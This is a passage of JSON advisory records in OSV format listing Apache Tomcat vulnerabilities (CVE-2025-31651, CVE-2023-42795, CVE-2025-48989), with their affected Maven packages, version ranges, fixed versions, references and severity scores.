"9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.102", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.10" }, { "fixed": "10.1.40" } ] } ], "versions": [ "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.6" } ] } ], "versions": [ "11.0.0", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/04/GHSA-ff77-26x5-69cr/GHSA-ff77-26x5-69cr.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-31651" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/066bf6b6a15a4e7e0941d4acf096841165b97098" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/175dc75fc428930034a6c93fb52f830d955d8e64" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ee3ab548e92345eca0cbd1f01649eb36c6f29454" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/fbecc915a10c5a3d634c5e2c6ced4ff479ce9953" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/list.html?announce@tomcat.apache.org" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/04/28/3" } ], "database_specific": { "cwe_ids": [ "CWE-116", "CWE-150" ], "github_reviewed": true, "github_reviewed_at": "2025-04-29T15:03:25Z", "nvd_published_at": "2025-04-28T20:15:20Z", "severity": "LOW" }, "severity": [ { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:L/VA:N/SC:N/SI:N/SA:N/E:U" } ] }, { "schema_version": "1.7.3", "id": "GHSA-g8pj-r55q-5c2v", "published": "2023-10-10T18:31:35Z", "modified": "2025-08-08T19:07:14.800663Z", "aliases": [ "BIT-tomcat-2023-42795", "CVE-2023-42795" ], "summary": "Apache Tomcat Incomplete Cleanup vulnerability", "details": "Incomplete Cleanup vulnerability in Apache Tomcat.\n\nWhen recycling various internal objects in Apache Tomcat from 11.0.0-M1 through 11.0.0-M11, from 10.1.0-M1 through 10.1.13, from 9.0.0-M1 through 9.0.80 and from 8.5.0 through 8.5.93, an error could cause Tomcat to skip some parts of the recycling process leading to information leaking from the current request/response to the next. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to version 11.0.0-M12 onwards, 10.1.14 onwards, 9.0.81 onwards or 8.5.94 onwards, which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.0-M12" } ] } ], "versions": [ "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.14" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.2", "10.1.4", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.81" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "fixed": "8.5.94" } ] } ], "versions": [ "8.5.0", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/10/GHSA-g8pj-r55q-5c2v/GHSA-g8pj-r55q-5c2v.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-42795" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/30f8063d7a9b4c43ae4722f5e382a76af1d7a6bf" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/44d05d75d696ca10ce251e4e370511e38f20ae75" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9375d67106f8df9eb9d7b360b2bef052fe67d3d4" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d6db22e411307c97ddf78315c15d5889356eca38" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/065jfyo583490r9j2v73nhpyxdob56lw" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20231103-0007" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5521" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/10/10/9" } ], "database_specific": { "cwe_ids": [ "CWE-459" ], "github_reviewed": true, "github_reviewed_at": "2023-10-10T22:30:05Z", "nvd_published_at": "2023-10-10T18:15:18Z", "severity": "MODERATE" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-gqp3-2cvr-x8m3", "published": "2025-08-13T15:30:34Z", "modified": "2025-11-05T21:04:59.959358Z", "aliases": [ "BIT-tomcat-2025-48989", "CVE-2025-48989" ], "summary": "Apache Tomcat Improper Resource Shutdown or Release vulnerability", "details": "Improper Resource Shutdown or Release vulnerability in Apache Tomcat made Tomcat vulnerable to the made you reset attack.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.9, from 10.1.0-M1 through 10.1.43 and from 9.0.0.M1 through 9.0.107. Older, EOL versions may also be affected.\n\nUsers are recommended to upgrade to one of versions 11.0.10, 10.1.44 or 9.0.108 which fix the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.44" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.108" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.10" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.44" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.108" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/08/GHSA-gqp3-2cvr-x8m3/GHSA-gqp3-2cvr-x8m3.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-48989" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/73c04a10395774bda71a0b37802cf983662ce255" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f362c8eb3b8ec5b7f312f7f5610731c0fb299a06" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/f36b8a4eea4ce8a0bc035079e1d259d29f5eb7bf" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/9ydfg0xr0tchmglcprhxgwhj0hfwxlyf" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://www.kb.cert.org/vuls/id/767506" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/08/13/2" } ], "database_specific": { "cwe_ids": [ "CWE-404" ], "github_reviewed": true, "github_reviewed_at": "2025-08-13T23:09:12Z", "nvd_published_at": "2025-08-13T13:15:34Z", "severity": "HIGH" }, "severity": [ { "type": 